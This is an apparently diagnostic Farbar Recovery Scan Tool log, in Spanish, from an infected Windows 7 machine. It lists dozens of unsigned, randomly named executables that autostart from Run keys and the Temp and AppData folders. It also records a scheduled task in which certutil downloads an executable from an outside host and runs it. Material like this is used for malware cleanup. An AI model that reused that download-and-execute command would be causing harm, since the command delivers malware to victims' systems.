Platform: Windows 7 Ultimate Service Pack 1 (X64) Idioma: Español (España, internacional)
Internet Explorer Versión 8 (Navegador predeterminado: Chrome)
Modo de Inicio: Normal
Tutorial para Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Procesos (Lista blanca) =================

(Si una entrada es incluida en el fixlist, el proceso será cerrado. El archivo no será movido.)

( ) [Archivo no firmado] C:\ProgramData\EventSvc\work0.exe
( ) [Archivo no firmado] C:\ProgramData\NtvHost\native.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\2j3xhwl5gqf\0xyemshxszc.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\4plii4obowa\vkfgpve1kmf.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\a5cqdmrbe54\pvtkqi5q5e2.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\dia1nwsj1y1\251zwfb1una.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\frr3pwvyetd\sqhrsfjrtyk.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\g2dncbivjiz\sbatxjutel4.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\hi4mbly3ii3\xpvfw24cqky.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\kdua1jfo123\vvegzej4wy2.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\mprw3ktcc2k\emdwzefyk2y.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\n0pczckdhog\i4loeahzfup.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\uhnrjry4bdn\jujerzwizaa.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\vfbtqr24hkh\oswlgg15f1h.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\vntlutefrev\30rwyhw2iwt.exe
( ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Roaming\x4sjscyv4hq\0pbpdqr0a5k.exe
() [Archivo no firmado] C:\Program Files (x86)\TVRadio\radiotvap.exe
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\3jl4s2k53rn\SRBhd0G8wx=.exe
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-007J5.tmp\oswlgg15f1h.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-1801B.tmp\251zwfb1una.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-27APO.tmp\emdwzefyk2y.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-3RUQC.tmp\0pbpdqr0a5k.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-AGTBR.tmp\xpvfw24cqky.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-GHA5E.tmp\0xyemshxszc.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-HQODJ.tmp\sbatxjutel4.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-I1NTH.tmp\sqhrsfjrtyk.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-I2K7L.tmp\30rwyhw2iwt.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-I4PTQ.tmp\vkfgpve1kmf.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-LVUEI.tmp\pvtkqi5q5e2.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-QLBVR.tmp\vvegzej4wy2.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-SDRGI.tmp\jujerzwizaa.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-T0S8A.tmp\i4loeahzfup.tmp
() [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\yhjfhl3s13b\Processlasso.exe
() [Archivo no firmado] C:\Windows\SearchIndexer.exe
() [Archivo no firmado] C:\Windows\SearchIndexer.exe
(5) [Archivo no firmado] C:\Program Files\0OP808P0KJ\IGQIGKLAV.exe
(5) [Archivo no firmado] C:\Program Files\6S3KYHHWIU\6S3KYHHWI.exe
(5) [Archivo no firmado] C:\Program Files\85E8BNNBEE\85E8BNNBE.exe
(5) [Archivo no firmado] C:\Program Files\9B24IF9AQM\9B24IF9AQ.exe
(5) [Archivo no firmado] C:\Program Files\ERTC7W5OYX\ERTC7W5OY.exe
(5) [Archivo no firmado] C:\Program Files\KHJ98BRLDV\U5XXOJRBU.exe
(5) [Archivo no firmado] C:\Program Files\NPUOW5G9P5\NPUOW5G9P.exe
(5) [Archivo no firmado] C:\Program Files\U24HP4O5BP\U24HP4O5B.exe
(5) [Archivo no firmado] C:\Program Files\U5EES31B4Q\8CRMSAUET.exe
(5) [Archivo no firmado] C:\Program Files\WAK3MKKWFC\WAK3MKKWF.exe
(5) [Archivo no firmado] C:\Program Files\YUGF9ZIQK7\YUGF9ZIQK.exe
(5) [Archivo no firmado] C:\Program Files\ZWD63K22V7\ZWD63K22V.exe
(ACD Systems International Inc -> ACD Systems) E:\Archivos de Programa\ACDSeePro5\ACDSee Pro\5.0\ACDSeeProInTouch2.exe
(Adobe Systems Incorporated -> Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe
(Advanced Micro Devices Inc.) [Archivo no firmado] C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(AN045KE6) [Archivo no firmado] C:\Program Files\AUXDGUNQ0L\AUXDGUNQ0.exe
(AN045KE6) [Archivo no firmado] C:\Program Files\NJ4SOTTRZH\NJ4SOTTRZ.exe
(Anomie4) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\St3mqofQ.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc. -> Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Apple Inc. -> Apple Inc.) E:\Archivos de Programa\iTunes\iTunesHelper.exe
(ATI Technologies Inc.) [Archivo no firmado] C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Box, Inc.) [Archivo no firmado] C:\Program Files\Box Sync\BoxSyncHelper.exe
(CloudBees, Inc.) [Archivo no firmado] C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
(CloudBees, Inc.) [Archivo no firmado] C:\ProgramData\EventSvc\eventsvc.exe
(EnigmaSoft Limited -> EnigmaSoft Limited) C:\Program Files\EnigmaSoft\SpyHunter\ShKernel.exe
(EnigmaSoft Limited -> EnigmaSoft Limited) C:\Program Files\EnigmaSoft\SpyHunter\ShMonitor.exe
(EnigmaSoft Limited -> EnigmaSoft Limited) C:\Program Files\EnigmaSoft\SpyHunter\SpyHunter5.exe
(Even Balance, Inc. -> ) C:\Windows\SysWOW64\PnkBstrA.exe
(EVERNOTE CORPORATION -> Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) [Archivo no firmado] C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe
(FlyStreets) [Archivo no firmado] C:\Program Files (x86)\Yhanj\25388233.exe
(FlyStreets) [Archivo no firmado] C:\Program Files (x86)\Yhanj\679940659.exe
(Gelbe vom Ei GmbH -> ) C:\Windows\trustedlogos\TrustedLogos.exe
(Google LLC -> ) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\1548926207.exe
(Google LLC -> Google LLC) C:\Users\MrEidrian\AppData\Local\GoogleChromeApplication\chrome.exe
(Google LLC -> Google LLC) C:\Users\MrEidrian\AppData\Local\GoogleChromeApplication\chrome.exe
(Google LLC -> Google LLC) C:\Users\MrEidrian\AppData\Local\GoogleChromeApplication\chrome.exe
(Google LLC -> Google LLC) C:\Users\MrEidrian\AppData\Local\GoogleChromeApplication\chrome.exe
(Google LLC -> Google LLC) C:\Users\MrEidrian\AppData\Local\GoogleChromeApplication\chrome.exe
(Google LLC -> Google LLC) C:\Users\MrEidrian\AppData\Local\GoogleChromeApplication\chrome.exe
(Google LLC -> Google LLC) C:\Users\MrEidrian\AppData\Local\GoogleChromeApplication\chrome.exe
(Google LLC -> Google) C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\SwReporter\44.215.200.3\software_reporter_tool.exe
(Google LLC -> Google) C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\SwReporter\44.215.200.3\software_reporter_tool.exe
(Google LLC -> Google) C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\SwReporter\44.215.200.3\software_reporter_tool.exe
(Google LLC -> Google) C:\Users\MrEidrian\AppData\Local\Google\Chrome\User Data\SwReporter\44.215.200.3\software_reporter_tool.exe
(GoPro) [Archivo no firmado] C:\Program Files (x86)\CineForm\Tools\GoProCineFormStatusViewer.exe
(Huawei Technologies Co., Ltd. -> ) [Archivo no firmado] C:\Program Files (x86)\HiSuite\HandSetService\HuaweiHiSuiteService64.exe
(Logitech -> Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDClock.exe
(Logitech -> Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDCountdown.exe
(Logitech -> Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDMedia.exe
(Logitech -> Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDPOP3.exe
(Logitech -> Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDRSS.exe
(Logitech -> Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
(Mega Limited -> Mega Limited) C:\ProgramData\MEGAsync\MEGAsync.exe
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation -> Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\cmd.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wisptis.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\wisptis.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Windows Hardware Compatibility Publisher -> AMD) C:\Windows\System32\atieclxx.exe
(Microsoft Windows Hardware Compatibility Publisher -> AMD) C:\Windows\System32\atiesrxx.exe
(Nero AG -> Nero AG) C:\Program Files (x86)\Common Files\Ahead\Lib\NMBgMonitor.exe
(Nero AG -> Nero AG) C:\Program Files (x86)\Common Files\Ahead\Lib\NMIndexingService.exe
(Nero AG -> Nero AG) C:\Program Files (x86)\Common Files\Ahead\Lib\NMIndexStoreSvr.exe
(Nitro Software, Inc. -> ) E:\Pro11\Nitro_UpdateService.exe
(Nitro Software, Inc. -> Nalpeiron Ltd.) C:\Windows\SysWOW64\NLSSRV32.EXE
(Nitro Software, Inc. -> Nitro Software, Inc.) E:\Pro11\NitroPDFDriverService11x64.exe
(Nullsoft, Inc.) [Archivo no firmado] C:\Program Files (x86)\Winamp\winampa.exe
(Numedia Soft, Inc. -> ) C:\Windows\SysWOW64\NMSAccess64.exe
(Piriform Software Ltd -> Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Realtek Semiconductor Corp -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Samsung Electronics CO., LTD. -> DEVGURU Co., LTD.) C:\Program Files\Samsung\USB Drivers\27_ssconn\conn\ss_conn_service.exe
(SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION) C:\ProgramData\EPSON\EPW!3 SSRP\E_S40RPB.EXE
(TeamViewer GmbH -> TeamViewer GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(TRAENGERB) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-I758J.tmp\lshost.exe
(TRAENGERB) [Archivo no firmado] C:\Users\MrEidrian\AppData\Local\Temp\is-IDB8M.tmp\lshost.exe
(Wacom Technology Corp. -> Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TouchService.exe
(Wacom Technology Corp. -> Wacom Technology, Corp.) C:\Program Files\Tablet\Pen\Pen_TouchUser.exe

==================== Registro (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado. El archivo no será movido.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [12503184 2012-06-11] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [7468784 2013-02-28] (Logitech -> Logitech Inc.)
HKLM\...\Run: [BoxSyncHelper] => C:\Program Files\Box Sync\BoxSyncHelper.exe [393216 2013-06-07] (Box, Inc.) [Archivo no firmado]
HKLM\...\Run: [iTunesHelper] => E:\Archivos de Programa\iTunes\iTunesHelper.exe [302904 2019-05-07] (Apple Inc. -> Apple Inc.)
HKLM-x32\...\Run: [WinampAgent] => C:\Program Files (x86)\Winamp\winampa.exe [74752 2012-06-20] (Nullsoft, Inc.) [Archivo no firmado]
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Test Signing Certificate -> Adobe Systems Incorporated) [Archivo no firmado]
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [76600 2019-05-03] (Apple Inc. -> Apple Inc.)
HKLM-x32\...\Run: [ACPW05EN] => E:\Archivos de Programa\ACDSeePro5\ACDSee Pro\5.0\ACDSeeProInTouch2.exe [822384 2011-09-20] (ACD Systems International Inc -> ACD Systems)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [766208 2013-08-30] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
HKLM\...\RunOnce: [wzq2q1j2xzy] => C:\Program Files (x86)\Yhanj\679940659.exe [485888 2019-08-31] (FlyStreets) [Archivo no firmado]
HKLM\...\RunOnce: [0e52wlmipja] => C:\Program Files (x86)\Yhanj\25388233.exe [485888 2019-08-31] (FlyStreets) [Archivo no firmado]
HKU\S-1-5-19\...\Run: [Sidebar] => %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun
HKU\S-1-5-20\...\Run: [Sidebar] => %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [DAEMON Tools Lite] => C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe [3672384 2012-04-11] (DT Soft Ltd -> DT Soft Ltd)
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] => C:\Program Files (x86)\Common Files\Ahead\Lib\NMBgMonitor.exe [152872 2007-06-27] (Nero AG -> Nero AG)
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [CCleaner Smart Cleaning] => C:\Program Files\CCleaner\CCleaner64.exe [24552064 2020-01-17] (Piriform Software Ltd -> Piriform Ltd)
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [GDHV8HQ09I0MW20] => C:\Program Files\KHJ98BRLDV\U5XXOJRBU.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [DUJBOJYM2QES8U3] => C:\Program Files\0OP808P0KJ\IGQIGKLAV.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [7543004] => C:\Users\MrEidrian\AppData\Roaming\frr3pwvyetd\sqhrsfjrtyk.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [1714324] => C:\Users\MrEidrian\AppData\Roaming\dia1nwsj1y1\251zwfb1una.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [HQHN7D6DKMX5F12] => C:\Program Files\WAK3MKKWFC\WAK3MKKWF.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [OD8V24UG04MY8H6] => C:\Program Files\YUGF9ZIQK7\YUGF9ZIQK.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [4692347] => C:\Users\MrEidrian\AppData\Roaming\n0pczckdhog\i4loeahzfup.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [6172493] => C:\Users\MrEidrian\AppData\Roaming\a5cqdmrbe54\pvtkqi5q5e2.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [QJXDKB3T0NBCZUM] => C:\Program Files\9B24IF9AQM\9B24IF9AQ.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [GXB70AFVZGVBZI1] => C:\Program Files\6S3KYHHWIU\6S3KYHHWI.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [4803196] => C:\Users\MrEidrian\AppData\Roaming\g2dncbivjiz\sbatxjutel4.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [7438577] => C:\Users\MrEidrian\AppData\Roaming\kdua1jfo123\vvegzej4wy2.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [88YLCFXRTWHOKTL] => C:\Program Files\ERTC7W5OYX\ERTC7W5OY.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [1387278] => C:\Users\MrEidrian\AppData\Roaming\mprw3ktcc2k\emdwzefyk2y.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [8525450] => C:\Users\MrEidrian\AppData\Roaming\hi4mbly3ii3\xpvfw24cqky.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [GFM4VKKOD8QYWVS] => C:\Program Files\U24HP4O5BP\U24HP4O5B.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [249KMWAKWKTT3J9] => C:\Program Files\NPUOW5G9P5\NPUOW5G9P.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [8R0SHNZNB2ILWZC] => C:\Program Files\ZWD63K22V7\ZWD63K22V.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [5972726] => C:\Users\MrEidrian\AppData\Roaming\4plii4obowa\vkfgpve1kmf.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [964528] => C:\Users\MrEidrian\AppData\Roaming\2j3xhwl5gqf\0xyemshxszc.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [VM227E5VN1KEOF3] => C:\Program Files\85E8BNNBEE\85E8BNNBE.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [HK4FKEDFGACN422] => C:\Program Files\U5EES31B4Q\8CRMSAUET.exe [1004032 2020-01-17] (5) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [8825304] => C:\Users\MrEidrian\AppData\Roaming\x4sjscyv4hq\0pbpdqr0a5k.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [5910964] => C:\Users\MrEidrian\AppData\Roaming\uhnrjry4bdn\jujerzwizaa.exe [1545070 2020-01-17] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [ZSBC9OI36Z15QG5] => C:\Program Files\NJ4SOTTRZH\NJ4SOTTRZ.exe [1004544 2020-01-31] (AN045KE6) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [6851699] => C:\Users\MrEidrian\AppData\Roaming\vntlutefrev\30rwyhw2iwt.exe [1042615 2020-01-31] ( ) [Archivo no firmado]
HKU\S-1-5-21-3862230028-3041123482-801023079-1000\...\Run: [5200897] => C:\Users\MrEidrian\AppData\Roaming\vfbtqr24hkh\oswlgg15f1h.exe [1042615 2020-01-31] ( ) [Archivo no firmado]
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\76.0.3809.132\Installer\chrmstp.exe [2019-09-01] (Google LLC -> Google LLC)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level
HKLM\Software\...\Authentication\Credential Providers: [{F8A0B131-5F68-486c-8040-7E8FC3C85BB6}] -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDCREDPROV.DLL [2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\CineForm Status.lnk [2013-09-22]
ShortcutTarget: CineForm Status.lnk -> C:\Program Files (x86)\CineForm\Tools\GoProCineFormStatusViewer.exe (GoPro) [Archivo no firmado]
Startup: C:\Users\MrEidrian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EvernoteClipper.lnk [2013-06-09]
ShortcutTarget: EvernoteClipper.lnk -> C:\Program Files (x86)\Evernote\Evernote\EvernoteClipper.exe (EVERNOTE CORPORATION -> Evernote Corp., 305 Walnut Street, Redwood City, CA 94063) [Archivo no firmado]
Startup: C:\Users\MrEidrian\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2018-01-20]
ShortcutTarget: MEGAsync.lnk -> C:\ProgramData\MEGAsync\MEGAsync.exe (Mega Limited -> Mega Limited)

==================== Tareas programadas (Lista blanca) ============

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

Task: {0083E528-8926-47CE-91D9-92F6EA2DE595} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [360448 2020-01-17] (CloudBees, Inc.) [Archivo no firmado]
Task: {10A13A2F-DFDC-42A4-8AAA-AB2806A12AE0} - System32\Tasks\{7DF45B6D-4599-459D-9B29-9015D1FFC05C} => C:\Windows\system32\pcalua.exe -a "E:\Archivos de Programa\DNI\CPin\_uninst\uninstaller.exe"
Task: {1DD6BF40-1D14-4D5F-AE7A-4B54E8364AA7} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [18458752 2020-01-17] (Piriform Software Ltd -> Piriform Ltd)
Task: {1F61FFE7-7027-4558-A257-516CA746C8C4} - System32\Tasks\MEGA\MEGAsync Update Task S-1-5-21-3862230028-3041123482-801023079-1000 => C:\ProgramData\MEGAsync\MEGAupdater.exe [615160 2020-01-17] (Mega Limited -> Mega Limited)
Task: {4A162AA3-469C-4D9E-A12C-2B0C30E8BBAD} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_238_pepper.exe [1452600 2019-08-14] (Adobe Inc. -> Adobe)
Task: {6FCCE8D2-CFB0-40BA-AB28-85C2EC41B36F} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [616320 2018-01-08] (Apple Inc. -> Apple Inc.)
Task: {74B6A54F-133A-4237-970B-54D16592BBED} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-01-17] (Adobe Inc. -> Adobe)
Task: {75A8EB91-7924-4CA3-871B-3F4954BAA4DD} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_32_0_0_238_Plugin.exe [1457208 2019-08-14] (Adobe Inc. -> Adobe)
Task: {76A23E0D-57BB-48F8-AD0B-66459606DC5D} - System32\Tasks\{A36708C4-9827-440F-94F4-EDD4E0E2D281} => C:\Windows\system32\pcalua.exe -a E:\Juegos\Steam\steam.exe -c steam://uninstall/17080
Task: {974172EE-5163-4B5F-9937-43C67070C014} - System32\Tasks\{FB348B64-F140-4DBE-9F28-F283B92EFEF3} => C:\Windows\system32\pcalua.exe -a "C:\Program Files\AVAST Software\Avast\aswRunDll.exe" -c "C:\Program Files\AVAST Software\Avast\Setup\setiface.dll" RunSetup
Task: {982453F1-781B-4DC2-978D-E90DCE055325} - System32\Tasks\CCleaner Update => C:\Program Files\CCleaner\CCUpdate.exe [608384 2020-01-17] (Piriform Software Ltd -> Piriform Software Ltd)
Task: {CFED4984-1DA7-4F67-8A7F-BA086BB4B105} - System32\Tasks\AdobeAAMUpdater-1.0-BANWORD-MrEidrian => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
Task: {DE0E33E3-8A41-451E-A4B7-B84AF703FF42} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://bigtext.club/app/app.exe C:\Users\MrEidrian\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\MrEidrian\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATENCIÓN
Task: {FAA6E360-A72B-4E5F-87ED-CA34E8E5D5D2} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [360448 2020-01-17] (CloudBees, Inc.) [Archivo no firmado]
Task: {FE1F2474-75FA-455D-B9C1-8ECFDCC669D4} - System32\Tasks\Opera scheduled Autoupdate 1380006602 => E:\Archivos de Programa\Opera\launcher.exe [1346584 2019-12-19] (Opera Software AS -> Opera Software)

(Si una entrada es incluida en el fixlist, el archivo de tarea (.job) será movido. El archivo que está siendo ejecutado por la tarea no será movido.)


==================== Internet (Lista blanca) ====================

(Si un elemento es incluido en el fixlist, y éste pertenece al registro, será eliminado o restaurado a su valor predeterminado.)

ProxyEnable: [S-1-5-21-3862230028-3041123482-801023079-1000] => Proxy está habilitado.
ProxyServer: [S-1-5-21-3862230028-3041123482-801023079-1000] => 127.0.0.1:8003
Winsock: Catalog5 07 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145648 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5 08 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [145648 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5 09 C:\Program Files (x86)\Bonjour\mdnsNSP.dll [122128 2015-08-12] (Apple Inc. -> Apple Inc.)
Winsock: Catalog5-x64 07 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171760 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 08 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [171760 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
Winsock: Catalog5-x64 09 C:\Program Files\Bonjour\mdnsNSP.dll [133392 2015-08-12] (Apple Inc. -> Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{DD68EF26-7605-461E-89EA-F338900C8CF6}: [DhcpNameServer] 192.168.0.1
ManualProxies: 1127.0.0.1:8003

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
